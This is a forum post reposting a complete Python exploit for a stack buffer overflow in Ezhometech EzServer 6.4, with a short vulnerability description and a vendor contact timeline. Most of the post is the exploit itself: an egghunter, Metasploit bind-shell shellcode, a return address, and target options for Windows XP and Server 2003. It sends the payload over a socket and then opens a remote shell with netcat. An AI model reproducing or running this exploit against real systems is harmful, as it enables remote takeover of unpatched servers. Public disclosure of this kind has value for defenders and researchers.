Jump to content
The_Arhitect

Ezhometech Ezserver 6.4 Stack Overflow Exploit

By The_Arhitect, in Exploituri

Recommended Posts

The_Arhitect Newbie

The_Arhitect

Posted
Posted

Ezhometech Ezserver 6.4 Stack Overflow Exploit

# Exploit Title: Ezhometech EzServer <=6.4 Stack Overflow Vulnerability
# Author: modpr0be
# Contact: research[at]Spentera[dot]com
# Platform: Windows
# Tested on: Windows XP SP3 (OptIn), Windows 2003 SP2 (OptIn)
# Software Link: http://www.ezhometech.com/buy_ezserver.htm
# References: http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-stack-overflow-vulnerability/

### Software Description
# EZserver is a Video Server that stream Full HD to various devices.

### Vulnerability Details
# Buffer overflow condition exist in URL handling, sending long GET request 
# will cause server process to exit and may allow malicious code injection. 
# Further research found that the application does not care about the HTTP method, 
# so that by sending long characters will make the program crash.

### Vendor logs:
# 06/11/2012 - Bug found
# 06/12/2012 - Vendor contacted
# 06/16/2012 - No response from vendor, POC release.

#!/usr/bin/python

import sys
import struct
from socket import *
from os import system
from time import sleep

hunt = (
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

#windows/shell_bind_tcp - 751 bytes
#http://www.metasploit.com
#Encoder: x86/alpha_upper
#AutoRunScript=, VERBOSE=false, EXITFUNC=process, LPORT=4444, 

shellcode = ("\x89\xe5\xda\xcf\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4c\x49\x45\x50"
"\x35\x50\x53\x30\x35\x30\x4b\x39\x4a\x45\x36\x51\x38\x52\x33"
"\x54\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x46\x32\x44\x4c\x4c\x4b"
"\x30\x52\x45\x44\x4c\x4b\x33\x42\x37\x58\x44\x4f\x38\x37\x51"
"\x5a\x57\x56\x50\x31\x4b\x4f\x36\x51\x4f\x30\x4e\x4c\x47\x4c"
"\x53\x51\x43\x4c\x34\x42\x46\x4c\x37\x50\x49\x51\x38\x4f\x54"
"\x4d\x53\x31\x38\x47\x4a\x42\x4a\x50\x36\x32\x56\x37\x4c\x4b"
"\x56\x32\x44\x50\x4c\x4b\x37\x32\x37\x4c\x43\x31\x38\x50\x4c"
"\x4b\x37\x30\x33\x48\x4b\x35\x59\x50\x54\x34\x31\x5a\x33\x31"
"\x4e\x30\x36\x30\x4c\x4b\x30\x48\x52\x38\x4c\x4b\x56\x38\x57"
"\x50\x53\x31\x4e\x33\x4a\x43\x57\x4c\x30\x49\x4c\x4b\x50\x34"
"\x4c\x4b\x53\x31\x39\x46\x50\x31\x4b\x4f\x36\x51\x59\x50\x4e"
"\x4c\x59\x51\x48\x4f\x34\x4d\x45\x51\x59\x57\x50\x38\x4b\x50"
"\x53\x45\x5a\x54\x33\x33\x53\x4d\x4b\x48\x47\x4b\x33\x4d\x31"
"\x34\x42\x55\x4a\x42\x46\x38\x4c\x4b\x36\x38\x31\x34\x45\x51"
"\x38\x53\x55\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x35"
"\x4c\x43\x31\x59\x43\x4c\x4b\x34\x44\x4c\x4b\x35\x51\x48\x50"
"\x4c\x49\x31\x54\x31\x34\x57\x54\x51\x4b\x31\x4b\x55\x31\x56"
"\x39\x30\x5a\x50\x51\x4b\x4f\x4d\x30\x31\x48\x31\x4f\x30\x5a"
"\x4c\x4b\x54\x52\x5a\x4b\x4d\x56\x51\x4d\x33\x58\x37\x43\x47"
"\x42\x45\x50\x53\x30\x43\x58\x34\x37\x53\x43\x46\x52\x31\x4f"
"\x50\x54\x52\x48\x30\x4c\x54\x37\x46\x46\x53\x37\x4b\x4f\x39"
"\x45\x58\x38\x4c\x50\x55\x51\x43\x30\x45\x50\x37\x59\x58\x44"
"\x46\x34\x56\x30\x53\x58\x31\x39\x4d\x50\x32\x4b\x45\x50\x4b"
"\x4f\x58\x55\x36\x30\x56\x30\x56\x30\x46\x30\x47\x30\x46\x30"
"\x31\x50\x46\x30\x55\x38\x4a\x4a\x44\x4f\x39\x4f\x4b\x50\x4b"
"\x4f\x48\x55\x4d\x59\x59\x57\x50\x31\x59\x4b\x30\x53\x55\x38"
"\x55\x52\x35\x50\x52\x31\x51\x4c\x4b\x39\x4a\x46\x32\x4a\x32"
"\x30\x31\x46\x50\x57\x35\x38\x49\x52\x59\x4b\x56\x57\x53\x57"
"\x4b\x4f\x39\x45\x30\x53\x51\x47\x52\x48\x4e\x57\x4d\x39\x37"
"\x48\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x50\x53\x30\x57\x35\x38"
"\x44\x34\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x56\x37\x4c"
"\x49\x58\x47\x43\x58\x34\x35\x42\x4e\x50\x4d\x53\x51\x4b\x4f"
"\x58\x55\x55\x38\x43\x53\x52\x4d\x33\x54\x55\x50\x4c\x49\x4b"
"\x53\x51\x47\x46\x37\x31\x47\x36\x51\x4c\x36\x33\x5a\x42\x32"
"\x31\x49\x46\x36\x5a\x42\x4b\x4d\x45\x36\x48\x47\x47\x34\x31"
"\x34\x37\x4c\x55\x51\x33\x31\x4c\x4d\x30\x44\x47\x54\x44\x50"
"\x48\x46\x35\x50\x30\x44\x30\x54\x30\x50\x46\x36\x51\x46\x56"
"\x36\x37\x36\x46\x36\x30\x4e\x31\x46\x51\x46\x51\x43\x31\x46"
"\x32\x48\x52\x59\x48\x4c\x57\x4f\x4b\x36\x4b\x4f\x38\x55\x4d"
"\x59\x4d\x30\x50\x4e\x56\x36\x51\x56\x4b\x4f\x36\x50\x43\x58"
"\x54\x48\x4c\x47\x55\x4d\x33\x50\x4b\x4f\x4e\x35\x4f\x4b\x4a"
"\x50\x58\x35\x4f\x52\x36\x36\x53\x58\x49\x36\x4d\x45\x4f\x4d"
"\x4d\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x53\x4c\x35\x5a\x4d"
"\x50\x4b\x4b\x4d\x30\x54\x35\x55\x55\x4f\x4b\x57\x37\x35\x43"
"\x32\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41"
"\x41")

junk1 = "\x41" * 5025
junk2 = "\x42" * 5029
junk3 = "\x43" * 10000
buff = "w00tw00t"
buff+= shellcode
buff+= "\x90" * 100
buff+= "\xeb\x08\x90\x90"
buff+= struct.pack('<L', 0x10212779)
buff+= "\x90" * 16
buff+= hunt
buff+= "\x44" * 5000

def winxp():
	try:
		host = raw_input("[!] Target IP: ")
		print "[!] Connecting to %s on port 8000" %host
		s = socket(AF_INET, SOCK_STREAM)
		s.connect((host,8000))
		print "[+] Launching attack.."
		print "[+] Sending payload.."
		payload = junk1+buff
		s.send (payload)
		s.close()
		print "[+] Wait for hunter.."
		sleep(5)
		print "[+] Connecting to target shell!"
		sleep(2)
		system("nc -v %s 4444" %host)
	except:
		print "[x] Could not connect to the server x_x"
		sys.exit()

def win2k3():
	try:
		host = raw_input("[!] Target IP: ")
		print "[!] Connecting to %s on port 8000" %host
		s = socket(AF_INET, SOCK_STREAM)
		s.connect((host,8000))
		print "[+] Launching attack.."
		print "[+] Sending payload.."
		payload = junk2+buff
		s.send(payload)
		s.close()
		print "[+] Wait for hunter.."
		sleep(5)
		print "[+] Connecting to target shell!"
		sleep(1)
		system("nc -v %s 4444" %host)
	except:
		print "[x] Could not connect to the server x_x"
		sys.exit()

def crash():
	try:
		host = raw_input("[!] Target IP: ")
		print "[!] Connecting to %s on port 8000" %host
		s = socket(AF_INET, SOCK_STREAM)
		s.connect((host,8000))
		print "[+] Launching attack.."
		print "[+] Sending payload.."
		payload = junk3
		s.send (payload)
		s.close()
		print "[+] Server should be crashed! Check your debugger"
	except:
		print "[x] Could not connect to the server x_x"
		sys.exit()

print "#################################################################"
print "#     EZHomeTech EZServer <= 6.4.0.17 Stack Overflow Exploit	#"
print "#              by modpr0be[at]spentera | @modpr0be		#"
print "#           thanks to: otoy, cikumel, y0k | @spentera		#"
print "================================================================="
print "\t1.Windows XP SP3 (DEP OptIn) bindshell on port 4444"
print "\t2.Windows 2003 SP2 (DEP OptIn) bindshell on port 4444"
print "\t3.Crash only (debug)\n"

a = 0
while a < 3:
	a = a + 1
	op = input ("[!] Choose your target OS: ")
	if op == 1:
		winxp()
		sys.exit()
	elif op == 2:
		win2k3()
		sys.exit()
	elif op == 3:
		crash()
		sys.exit()
	else:
		print "[-] Oh plz.. pick the right one \r\n"

Sursa: Ezhometech Ezserver 6.4 Stack Overflow Exploit

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...